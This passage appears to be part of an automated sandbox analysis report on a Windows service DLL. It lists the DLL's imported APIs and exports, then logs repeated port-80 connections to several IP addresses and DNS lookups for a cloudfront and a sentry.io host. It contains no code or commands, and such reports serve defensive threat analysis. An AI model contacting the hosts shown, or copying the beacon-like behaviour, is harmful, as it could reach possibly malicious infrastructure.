                                  kernel32.dllGetOEMCP, GetCommandLineA, FlsAlloc, GetACP, FreeLibrary, HeapFree, GetProcessHeap, FlsGetValue, lstrlenW, CreateMutexA, GetCurrentProcessId, WaitForSingleObjectEx, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, WideCharToMultiByte, ReleaseMutex, GetNativeSystemInfo, GetSystemInfo, FlsSetValue, GetLastError, LCMapStringW, GetModuleHandleA, GetComputerNameExW, VirtualQuery, LoadLibraryExW, IsValidCodePage, FindFirstFileExW, HeapAlloc, GetModuleHandleExW, GetModuleHandleW, RtlPcToFileHeader, RaiseException, GetStringTypeW, HeapSize, FormatMessageW, FlsFree, CreateEventW, SetStdHandle, GetConsoleOutputCP, DuplicateHandle, EncodePointer, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InterlockedFlushSList, SetHandleInformation, RtlUnwindEx, IsProcessorFeaturePresent, GetStartupInfoW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcess, LoadLibraryA, GetProcAddress, CreateIoCompletionPort, GetQueuedCompletionStatusEx, PostQueuedCompletionStatus, CloseHandle, GetCPInfo, ReadFile, GetOverlappedResult, WriteFile, SetFileCompletionNotificationModes, Sleep, WriteConsoleW, MultiByteToWideChar, GetCommandLineW, ExitProcess, GetFileType, GetConsoleMode, HeapReAlloc, GetSystemTimePreciseAsFileTime, SetWaitableTimer, CreateWaitableTimerExW, CreateThread, CancelIo, WaitForMultipleObjects, ReadFileEx, CreateNamedPipeW, GetTempPathW, CopyFileExW, DeleteFileW, FindFirstFileW, WaitForSingleObject, SetFileInformationByHandle, SetThreadStackGuarantee, GetCurrentThread, SetLastError, GetFullPathNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetModuleFileNameW, GetEnvironmentVariableW, GetCurrentDirectoryW, WriteFileEx, SleepEx, SwitchToThread, QueryPerformanceCounter, QueryPerformanceFrequency, FreeEnvironmentStringsW, DeleteProcThreadAttributeList, GetEnvironmentStringsW, CompareStringOrdinal, GetFileAttributesW, CreateProcessW, GetStdHandle, TerminateProcess, GetExitCodeProcess, InitializeProcThreadAttributeList, UpdateProcThreadAttribute, FindNextFileW, FindClose, CreateFileW, FlushFileBuffers, GetFileInformationByHandle, GetFileInformationByHandleEx, SetFilePointerEx
                                  advapi32.dllRegisterServiceCtrlHandlerExW, SetServiceStatus, SystemFunction036, RegCloseKey, RegQueryValueExW, RegOpenKeyExW
                                  oleaut32.dllSafeArrayCreateVector, SysAllocStringLen, SysStringLen, SysFreeString, GetErrorInfo, SafeArrayPutElement, SafeArrayGetLBound, SafeArrayDestroy, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayCreate, SafeArrayGetUBound, VariantClear
                                  ole32.dllCoSetProxyBlanket, CoInitializeEx, CoCreateInstance, CoInitializeSecurity
                                  user32.dllGetSystemMetrics
                                  secur32.dllAcquireCredentialsHandleA, QueryContextAttributesW, ApplyControlToken, EncryptMessage, AcceptSecurityContext, FreeContextBuffer, InitializeSecurityContextW, DecryptMessage, DeleteSecurityContext, FreeCredentialsHandle
                                  crypt32.dllCertFreeCertificateChain, CertDuplicateCertificateChain, CertEnumCertificatesInStore, CertAddCertificateContextToStore, CertOpenStore, CertCloseStore, CertDuplicateStore, CertDuplicateCertificateContext, CertFreeCertificateContext, CertVerifyCertificateChainPolicy, CertGetCertificateChain
                                  bcrypt.dllBCryptGenRandom
                                  ntdll.dllRtlNtStatusToDosError, NtCreateFile, NtWriteFile, NtCancelIoFileEx, NtDeviceIoControlFile, NtReadFile
                                  PSAPI.DLLGetModuleFileNameExW, EnumProcessModules, GetModuleInformation

                                  Exports

                                  NameOrdinalAddress
                                  DllMain10x180134480
                                  ServiceMain20x180122500
                                  get_hostfxr_path30x180134490

                                  Possible Origin

                                  Language of compilation systemCountry where language is spokenMap
                                  EnglishUnited States

                                  Network Behavior

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Dec 19, 2024 15:33:37.226315022 CET4974780192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:37.345891953 CET804974713.227.9.174192.168.2.6
                                  Dec 19, 2024 15:33:37.345968008 CET4974780192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:37.346776009 CET4974780192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:37.466161966 CET804974713.227.9.174192.168.2.6
                                  Dec 19, 2024 15:33:38.303883076 CET4974780192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:40.514132023 CET4975880192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:40.633680105 CET804975813.227.9.174192.168.2.6
                                  Dec 19, 2024 15:33:40.633867979 CET4975880192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:40.634614944 CET4975880192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:40.754399061 CET804975813.227.9.174192.168.2.6
                                  Dec 19, 2024 15:33:42.285434961 CET804975813.227.9.174192.168.2.6
                                  Dec 19, 2024 15:33:42.330512047 CET4975880192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:42.605783939 CET4975880192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:42.725562096 CET804975813.227.9.174192.168.2.6
                                  Dec 19, 2024 15:33:42.725708961 CET4975880192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:42.845298052 CET804975813.227.9.174192.168.2.6
                                  Dec 19, 2024 15:33:43.199361086 CET804975813.227.9.174192.168.2.6
                                  Dec 19, 2024 15:33:43.250797033 CET4975880192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:43.484348059 CET49769443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:33:43.484410048 CET4434976934.120.62.213192.168.2.6
                                  Dec 19, 2024 15:33:43.484529972 CET49769443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:33:43.538897991 CET49769443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:33:43.538925886 CET4434976934.120.62.213192.168.2.6
                                  Dec 19, 2024 15:33:44.758753061 CET4434976934.120.62.213192.168.2.6
                                  Dec 19, 2024 15:33:44.758894920 CET49769443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:33:44.760616064 CET49769443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:33:44.760623932 CET4434976934.120.62.213192.168.2.6
                                  Dec 19, 2024 15:33:44.760934114 CET4434976934.120.62.213192.168.2.6
                                  Dec 19, 2024 15:33:44.812588930 CET49769443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:33:44.822614908 CET49769443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:33:44.822688103 CET4434976934.120.62.213192.168.2.6
                                  Dec 19, 2024 15:33:45.197041035 CET4434976934.120.62.213192.168.2.6
                                  Dec 19, 2024 15:33:45.197119951 CET4434976934.120.62.213192.168.2.6
                                  Dec 19, 2024 15:33:45.197721958 CET49769443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:33:45.198025942 CET49769443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:33:45.198045969 CET4434976934.120.62.213192.168.2.6
                                  Dec 19, 2024 15:33:48.250279903 CET4978580192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:33:48.369898081 CET8049785195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:33:48.369996071 CET4978580192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:33:48.370152950 CET4978580192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:33:48.489675045 CET8049785195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:33:49.716358900 CET8049785195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:33:49.765749931 CET4978580192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:33:49.913068056 CET4978580192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:33:50.033763885 CET8049785195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:33:50.033859968 CET4978580192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:33:50.153448105 CET8049785195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:33:50.350435972 CET8049785195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:33:50.399667978 CET4978580192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:33:52.619760036 CET4975880192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:52.739644051 CET804975813.227.9.174192.168.2.6
                                  Dec 19, 2024 15:33:52.739986897 CET4975880192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:55.356545925 CET4980280192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:55.476686001 CET804980213.227.9.174192.168.2.6
                                  Dec 19, 2024 15:33:55.479384899 CET4980280192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:55.479561090 CET4980280192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:55.601279020 CET804980213.227.9.174192.168.2.6
                                  Dec 19, 2024 15:33:57.195384979 CET804980213.227.9.174192.168.2.6
                                  Dec 19, 2024 15:33:57.244748116 CET4980280192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:57.397694111 CET4980280192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:57.517165899 CET804980213.227.9.174192.168.2.6
                                  Dec 19, 2024 15:33:57.517258883 CET4980280192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:57.637836933 CET804980213.227.9.174192.168.2.6
                                  Dec 19, 2024 15:33:57.995872021 CET804980213.227.9.174192.168.2.6
                                  Dec 19, 2024 15:33:58.040493965 CET4980280192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:59.930838108 CET4978580192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:00.051045895 CET8049785195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:00.051106930 CET4978580192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:03.010041952 CET4982180192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:03.129614115 CET8049821195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:03.129704952 CET4982180192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:03.129868984 CET4982180192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:03.249797106 CET8049821195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:04.454114914 CET8049821195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:04.508984089 CET4982180192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:05.156804085 CET4982180192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:05.281114101 CET8049821195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:05.281177998 CET4982180192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:05.400801897 CET8049821195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:05.598139048 CET8049821195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:05.643403053 CET4982180192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:07.410480976 CET4980280192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:07.532530069 CET804980213.227.9.174192.168.2.6
                                  Dec 19, 2024 15:34:07.532587051 CET4980280192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:10.620111942 CET4983980192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:10.739814043 CET804983913.227.9.174192.168.2.6
                                  Dec 19, 2024 15:34:10.740031958 CET4983980192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:10.740097046 CET4983980192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:10.859872103 CET804983913.227.9.174192.168.2.6
                                  Dec 19, 2024 15:34:12.379698992 CET804983913.227.9.174192.168.2.6
                                  Dec 19, 2024 15:34:12.426156044 CET4983980192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:12.557523966 CET4983980192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:12.677548885 CET804983913.227.9.174192.168.2.6
                                  Dec 19, 2024 15:34:12.677674055 CET4983980192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:12.797143936 CET804983913.227.9.174192.168.2.6
                                  Dec 19, 2024 15:34:13.163121939 CET804983913.227.9.174192.168.2.6
                                  Dec 19, 2024 15:34:13.215950012 CET4983980192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:15.174087048 CET4982180192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:15.295435905 CET8049821195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:15.297642946 CET4982180192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:18.171370029 CET4985680192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:18.291194916 CET8049856195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:18.291336060 CET4985680192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:18.291609049 CET4985680192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:18.411369085 CET8049856195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:19.637278080 CET8049856195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:19.687573910 CET4985680192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:19.815155029 CET4985680192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:19.934806108 CET8049856195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:19.934922934 CET4985680192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:20.060491085 CET8049856195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:20.301285982 CET8049856195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:20.348638058 CET4985680192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:22.568510056 CET4983980192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:22.688543081 CET804983913.227.9.174192.168.2.6
                                  Dec 19, 2024 15:34:22.689517021 CET4983980192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:25.304825068 CET4987680192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:25.424400091 CET804987613.227.9.174192.168.2.6
                                  Dec 19, 2024 15:34:25.424587011 CET4987680192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:25.424748898 CET4987680192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:25.544274092 CET804987613.227.9.174192.168.2.6
                                  Dec 19, 2024 15:34:27.064802885 CET804987613.227.9.174192.168.2.6
                                  Dec 19, 2024 15:34:27.115391970 CET4987680192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:27.354855061 CET4987680192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:27.474721909 CET804987613.227.9.174192.168.2.6
                                  Dec 19, 2024 15:34:27.474833965 CET4987680192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:27.594317913 CET804987613.227.9.174192.168.2.6
                                  Dec 19, 2024 15:34:27.944556952 CET804987613.227.9.174192.168.2.6
                                  Dec 19, 2024 15:34:27.997677088 CET4987680192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:29.827049971 CET4985680192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:29.946962118 CET8049856195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:29.947118998 CET4985680192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:32.952460051 CET4989380192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:33.072006941 CET8049893195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:33.072086096 CET4989380192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:33.072304010 CET4989380192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:33.191698074 CET8049893195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:34.408550024 CET8049893195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:34.452037096 CET4989380192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:34.696934938 CET4989380192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:34.817320108 CET8049893195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:34.817425013 CET4989380192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:34.937192917 CET8049893195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:35.134330034 CET8049893195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:35.184134960 CET4989380192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:37.357224941 CET4987680192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:37.477333069 CET804987613.227.9.174192.168.2.6
                                  Dec 19, 2024 15:34:37.478703976 CET4987680192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:40.349100113 CET4990980192.168.2.613.227.9.48
                                  Dec 19, 2024 15:34:40.469360113 CET804990913.227.9.48192.168.2.6
                                  Dec 19, 2024 15:34:40.469491005 CET4990980192.168.2.613.227.9.48
                                  Dec 19, 2024 15:34:40.469644070 CET4990980192.168.2.613.227.9.48
                                  Dec 19, 2024 15:34:40.589627981 CET804990913.227.9.48192.168.2.6
                                  Dec 19, 2024 15:34:42.144905090 CET804990913.227.9.48192.168.2.6
                                  Dec 19, 2024 15:34:42.185398102 CET4990980192.168.2.613.227.9.48
                                  Dec 19, 2024 15:34:42.309211016 CET4990980192.168.2.613.227.9.48
                                  Dec 19, 2024 15:34:42.429059982 CET804990913.227.9.48192.168.2.6
                                  Dec 19, 2024 15:34:42.429136992 CET4990980192.168.2.613.227.9.48
                                  Dec 19, 2024 15:34:42.548983097 CET804990913.227.9.48192.168.2.6
                                  Dec 19, 2024 15:34:42.902257919 CET804990913.227.9.48192.168.2.6
                                  Dec 19, 2024 15:34:42.952112913 CET4990980192.168.2.613.227.9.48
                                  Dec 19, 2024 15:34:44.703485966 CET4989380192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:44.823851109 CET8049893195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:44.823935032 CET4989380192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:47.907129049 CET4992780192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:48.026819944 CET8049927195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:48.026957035 CET4992780192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:48.027105093 CET4992780192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:48.146775007 CET8049927195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:49.359086990 CET8049927195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:49.406656027 CET4992780192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:50.026510000 CET4992780192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:50.146429062 CET8049927195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:50.146585941 CET4992780192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:50.270704985 CET8049927195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:50.462704897 CET8049927195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:50.465574980 CET49933443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:34:50.465622902 CET4434993334.120.62.213192.168.2.6
                                  Dec 19, 2024 15:34:50.465672970 CET49933443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:34:50.466101885 CET49933443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:34:50.466111898 CET4434993334.120.62.213192.168.2.6
                                  Dec 19, 2024 15:34:50.513051987 CET4992780192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:51.679030895 CET4434993334.120.62.213192.168.2.6
                                  Dec 19, 2024 15:34:51.679099083 CET49933443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:34:51.681154966 CET49933443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:34:51.681164026 CET4434993334.120.62.213192.168.2.6
                                  Dec 19, 2024 15:34:51.681421041 CET4434993334.120.62.213192.168.2.6
                                  Dec 19, 2024 15:34:51.691301107 CET49933443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:34:51.691339016 CET4434993334.120.62.213192.168.2.6
                                  Dec 19, 2024 15:34:52.121267080 CET4434993334.120.62.213192.168.2.6
                                  Dec 19, 2024 15:34:52.121356010 CET4434993334.120.62.213192.168.2.6
                                  Dec 19, 2024 15:34:52.121403933 CET49933443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:34:52.121912003 CET49933443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:34:52.121912003 CET49933443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:34:52.121931076 CET4434993334.120.62.213192.168.2.6
                                  Dec 19, 2024 15:34:52.121942043 CET4434993334.120.62.213192.168.2.6
                                  Dec 19, 2024 15:34:52.311577082 CET4990980192.168.2.613.227.9.48
                                  Dec 19, 2024 15:34:52.431646109 CET804990913.227.9.48192.168.2.6
                                  Dec 19, 2024 15:34:52.433314085 CET4990980192.168.2.613.227.9.48
                                  Dec 19, 2024 15:34:55.469716072 CET4994580192.168.2.613.227.9.48
                                  Dec 19, 2024 15:34:55.589534044 CET804994513.227.9.48192.168.2.6
                                  Dec 19, 2024 15:34:55.589617014 CET4994580192.168.2.613.227.9.48
                                  Dec 19, 2024 15:34:55.589782000 CET4994580192.168.2.613.227.9.48
                                  Dec 19, 2024 15:34:55.709394932 CET804994513.227.9.48192.168.2.6
                                  Dec 19, 2024 15:34:57.333468914 CET804994513.227.9.48192.168.2.6
                                  Dec 19, 2024 15:34:57.374138117 CET4994580192.168.2.613.227.9.48
                                  Dec 19, 2024 15:34:57.516567945 CET4994580192.168.2.613.227.9.48
                                  Dec 19, 2024 15:34:57.636612892 CET804994513.227.9.48192.168.2.6
                                  Dec 19, 2024 15:34:57.636703968 CET4994580192.168.2.613.227.9.48
                                  Dec 19, 2024 15:34:57.759418011 CET804994513.227.9.48192.168.2.6
                                  Dec 19, 2024 15:34:58.107574940 CET804994513.227.9.48192.168.2.6
                                  Dec 19, 2024 15:34:58.159410000 CET4994580192.168.2.613.227.9.48
                                  Dec 19, 2024 15:35:00.035732985 CET4992780192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:00.156249046 CET8049927195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:35:00.158763885 CET4992780192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:03.114114046 CET4996080192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:03.234601021 CET8049960195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:35:03.234860897 CET4996080192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:03.235033035 CET4996080192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:03.354643106 CET8049960195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:35:04.601799011 CET8049960195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:35:04.644942999 CET4996080192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:05.054141998 CET4996080192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:05.173659086 CET8049960195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:35:05.173742056 CET4996080192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:05.293358088 CET8049960195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:35:05.494539022 CET8049960195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:35:05.540724039 CET4996080192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:07.526484966 CET4994580192.168.2.613.227.9.48
                                  Dec 19, 2024 15:35:07.646891117 CET804994513.227.9.48192.168.2.6
                                  Dec 19, 2024 15:35:07.646955967 CET4994580192.168.2.613.227.9.48
                                  Dec 19, 2024 15:35:10.497674942 CET4997680192.168.2.613.227.9.48
                                  Dec 19, 2024 15:35:10.617288113 CET804997613.227.9.48192.168.2.6
                                  Dec 19, 2024 15:35:10.617558956 CET4997680192.168.2.613.227.9.48
                                  Dec 19, 2024 15:35:10.617825985 CET4997680192.168.2.613.227.9.48
                                  Dec 19, 2024 15:35:10.738128901 CET804997613.227.9.48192.168.2.6
                                  Dec 19, 2024 15:35:12.266375065 CET804997613.227.9.48192.168.2.6
                                  Dec 19, 2024 15:35:12.307797909 CET4997680192.168.2.613.227.9.48
                                  Dec 19, 2024 15:35:12.611402988 CET4997680192.168.2.613.227.9.48
                                  Dec 19, 2024 15:35:12.730914116 CET804997613.227.9.48192.168.2.6
                                  Dec 19, 2024 15:35:12.732884884 CET4997680192.168.2.613.227.9.48
                                  Dec 19, 2024 15:35:12.852514029 CET804997613.227.9.48192.168.2.6
                                  Dec 19, 2024 15:35:13.203299999 CET804997613.227.9.48192.168.2.6
                                  Dec 19, 2024 15:35:13.253485918 CET4997680192.168.2.613.227.9.48
                                  Dec 19, 2024 15:35:15.056364059 CET4996080192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:15.176415920 CET8049960195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:35:15.176522017 CET4996080192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:18.213044882 CET4999480192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:18.332698107 CET8049994195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:35:18.332798004 CET4999480192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:18.332947016 CET4999480192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:18.452375889 CET8049994195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:35:19.653090954 CET8049994195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:35:19.697009087 CET4999480192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:19.815685034 CET4999480192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:19.935368061 CET8049994195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:35:19.935591936 CET4999480192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:20.055485964 CET8049994195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:35:20.257862091 CET8049994195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:35:20.302297115 CET4999480192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:22.615950108 CET4997680192.168.2.613.227.9.48
                                  Dec 19, 2024 15:35:22.736148119 CET804997613.227.9.48192.168.2.6
                                  Dec 19, 2024 15:35:22.736310959 CET4997680192.168.2.613.227.9.48
                                  Dec 19, 2024 15:35:25.274487972 CET5001080192.168.2.613.227.9.48
                                  Dec 19, 2024 15:35:25.394303083 CET805001013.227.9.48192.168.2.6
                                  Dec 19, 2024 15:35:25.394459009 CET5001080192.168.2.613.227.9.48
                                  Dec 19, 2024 15:35:25.394576073 CET5001080192.168.2.613.227.9.48
                                  Dec 19, 2024 15:35:25.514149904 CET805001013.227.9.48192.168.2.6
                                  Dec 19, 2024 15:35:27.055901051 CET805001013.227.9.48192.168.2.6
                                  Dec 19, 2024 15:35:27.100364923 CET5001080192.168.2.613.227.9.48
                                  Dec 19, 2024 15:35:27.295422077 CET5001080192.168.2.613.227.9.48
                                  Dec 19, 2024 15:35:27.415819883 CET805001013.227.9.48192.168.2.6
                                  Dec 19, 2024 15:35:27.415915966 CET5001080192.168.2.613.227.9.48
                                  Dec 19, 2024 15:35:27.536433935 CET805001013.227.9.48192.168.2.6
                                  Dec 19, 2024 15:35:27.901771069 CET805001013.227.9.48192.168.2.6
                                  Dec 19, 2024 15:35:27.944278955 CET5001080192.168.2.613.227.9.48
                                  Dec 19, 2024 15:35:29.820472956 CET4999480192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:29.940943956 CET8049994195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:35:29.941006899 CET4999480192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:32.914710999 CET5001780192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:33.036329985 CET8050017195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:35:33.036571026 CET5001780192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:33.036667109 CET5001780192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:33.156210899 CET8050017195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:35:34.405636072 CET8050017195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:35:34.445753098 CET5001780192.168.2.6195.133.1.117

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Dec 19, 2024 15:33:36.732510090 CET5129153192.168.2.61.1.1.1
                                  Dec 19, 2024 15:33:37.191641092 CET53512911.1.1.1192.168.2.6
                                  Dec 19, 2024 15:33:43.249764919 CET5622153192.168.2.61.1.1.1
                                  Dec 19, 2024 15:33:43.471576929 CET53562211.1.1.1192.168.2.6
                                  Dec 19, 2024 15:34:40.140265942 CET6157753192.168.2.61.1.1.1
                                  Dec 19, 2024 15:34:40.348290920 CET53615771.1.1.1192.168.2.6

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Dec 19, 2024 15:33:36.732510090 CET192.168.2.61.1.1.10xebd2Standard query (0)d2np1vqkcxhde6.cloudfront.netA (IP address)IN (0x0001)false
                                  Dec 19, 2024 15:33:43.249764919 CET192.168.2.61.1.1.10xc47eStandard query (0)o4508128816857088.ingest.de.sentry.ioA (IP address)IN (0x0001)false
                                  Dec 19, 2024 15:34:40.140265942 CET192.168.2.61.1.1.10x1ae4Standard query (0)d2np1vqkcxhde6.cloudfront.netA (IP address)IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
